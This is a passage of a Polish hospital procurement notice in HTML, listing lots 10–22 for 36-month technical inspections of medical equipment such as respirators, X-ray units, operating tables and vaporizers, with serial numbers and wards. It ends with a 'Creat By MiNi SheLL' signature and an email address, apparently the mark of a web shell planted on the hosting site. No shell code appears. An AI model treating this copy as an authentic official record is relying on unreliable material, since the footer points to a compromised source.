<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 36.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Przeglądy techniczne lamp operacyjnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	LAMPY OPERACYJNE SUFITOWE  2 czasze
   STERIS	BLOK OPERACYJNY
	3.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.40.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 36.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Przeglądy techniczne myjnia automatyczna.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Myjnia automatyczna OLYMPUS ETD 3 BASIC PAA nr  081130861 2000 
OLYMPUS                      	PRACOWNIA     ENDOSKOPII	1.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.40.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 36.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Przeglądy techniczne parowników.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	TEC 7 Sevofluran    BEJJ  03878 
2006 DATEX-OHMEDA	 ANESTEZJOLOGIA 	1
2.	TEC 7  Sevofluran   BEJJ  03879
2006 DATEX-OHMEDA	 ANESTEZJOLOGIA	1
3.	TEC 7  Sevofluran   BEJL  03782
2006 DATEX-OHMEDA	 ANESTEZJOLOGIA	1.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.40.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 36.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> Przeglądy techniczne sprzęt różny 1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Pompa żywieniowa dojelitowa   800  59959136 
2004
FLOCARE
	ODDZ. WEWNĘTRZNY	1
2.	Pompa żywieniowa dojelitowa   800  
2004
FLOCARE	CHIRURGIA OGÓLNA	1
3.	Pompa żywieniowa dojelitowa INFULITY FLOCARE	OIT	1
4.	EKG BTL-08MT+ 0736774	ODDZ. GINEKOLOGII	1
5.	CIEPLARKA B6030 40924174
THERMO ELEKTRON CORPORATIOM	PUNKT PRZYJĘĆ MATERIAŁÓW	1.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.40.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 36.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> Przeglądy techniczne sprężarek.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	SPRĘŻARKA  NR 1   10349027-0291 
2002 CompAir  KRAKÓW	Dział Tech. Ekspl.	1
2.	SPRĘŻARKA  NR 2 10349027-0292
2002 CompAir  KRAKÓW	Dział Tech. Ekspl.	1.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.40.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 36.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 15 <b>NAZWA:</b> Przeglądy techniczne respiratorów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Respirator Centiva PLUS 17051327
Datex-Ohmeda	     OIT	1
2.	Respirator  CENTIVA 5 17051240
Datex-Ohmeda	     OIT	1
3.	Respirator Centiva  PLUS 19060295   
Datex-Ohmeda	    SOR	1
4.	RESPIRATOR TRANSPORTOWY Micro VENT 8414000 ACE 12983590 2001	Zespoły Wyjazdowe	1
5.	Respirator     SAVINA 8414000	NEUROLOGIA	1
6.	Respirator    SecristIV 100B nr 7276 IV 100B
DRAGER	ANESTEZJOLOGIA	1.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.40.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 36.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 16 <b>NAZWA:</b> Przeglądy techniczne sprzęt różny 2.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	PIŁA OSCYLACYJNA     /     68284 
GL 2000/83 LEIBINGER 	Oddział Chirurgii  Urazowej	1
2.	Koncentrator  tlenu           SN:0069103
Ever Flo / 2011 PHILIPS	POR. MED. PALIATYWNEJ	1
3.	Koncentrator  tlenu           SN:0069075
Ever Flo / 2011 PHILIPS	POR. MED. PALIATYWNEJ	1
4.	SSAK ELEKTRYCZNY     /      nr  19959 
SO - 4  OGARIT	Blok Operacyjny	1
5.	Zasilacz PENTAX             /  nr EB 021181
LH-150 FP PENTAX	PRACOWNIA ENDOSKOPOWA	1
6.	SSAK ELEKTRYCZNY     /      nr  10955
New Askir CA-MI	POR. MED. PALIATYWNEJ	1
7.	SSAK ELEKTRYCZNY     /      nr  10954 
New Askir CA-MI	POR. MED. PALIATYWNEJ	1
8.	SSAK ELEKTRYCZNY   
New Askir	Poradnia otolaryngologiczne	1
9.	LAMPA BEZCIENIOWA z UPS / nr 270 
BSH-302A FAMED	SOR	1
10.	LAMPA BEZCIENIOWA SUFITOWA / nr NO 0314  MERILUX X5 MERIVARA
	SOR	1
11.	ŻRÓDŁO  ŚWIATŁA   nr 1030698 
PRECOPTIK	SOR	1.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.40.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 36.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 17 <b>NAZWA:</b> Przeglądy techniczne aparaty rtg.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Aparat RTG Dig. SILHOWETTE     /                 SN: BHF 34906 
SILHOWETTE 20 HE 
GE MEDICAL SYSTEM	LUBAWA	1
2.	Aparat RTG POLYMOBIL PLUS / 10335 S 16L                   ( przyłóżkowy )  
POLYMOBIL PLUS  / 2000 
SIEMENS	    SOR	1
3.	Aparat RTG POLYMOBIL III      / 01713 S 16            ( przyłóżkowy ) 
POLYMOBIL III       /  1995 
SIEMENS	NEUROL.	1.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.40.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 36.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 18 <b>NAZWA:</b> Przeglądy techniczne stół operacyjny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	STÓŁ OPERACYJNY   S/N 0706/00304
SU 04.0 FAMED ŻYWIEC
	BLOK  OPERACYJNY 	1
2.	STÓŁ OPERACYJNY   S/N 0706/00305 
    SU 04.0 FAMED ŻYWIEC	BLOK  OPERACYJNY 	1
3.	STÓŁ OPERACYJNY   S/N 0706/00306 
    SU 04.0 FAMED ŻYWIEC	BLOK  OPERACYJNY 	1.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.40.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 36.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 19 <b>NAZWA:</b> Przeglądy techniczne aparat USG.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	USG    Sonoline     nr  DE 71110
Sonoline sx / 1988   Siemens	Poradnia LUBAWA	1.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.40.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 36.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 20 <b>NAZWA:</b> Przeglądy techniczne konsola.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Konsola STRYKER TPS  + pedał sterujący    /  98112343  5100-002-000 STRYKER	BLOK OPERACYJNY
	1.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.40.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 36.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 21 <b>NAZWA:</b> Przeglądy techniczne napęd drzwi.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Napęd rozwieralny drzwi automatycznych TORMAX
	BLOK OPERACYJNY
	9.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.40.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 36.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 22 <b>NAZWA:</b> Przeglądy techniczne i pełna opieka serwisowa skaner.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	 Skaner CR30-X +NX,  nr 50755 Agfa Sp. z o.o.
Pełna opieka serwisowa wraz z wymaganymi przeglądami technicznymi w okresie 12 miesięcy	Pracowania rtg Lubawa	1.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.40.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com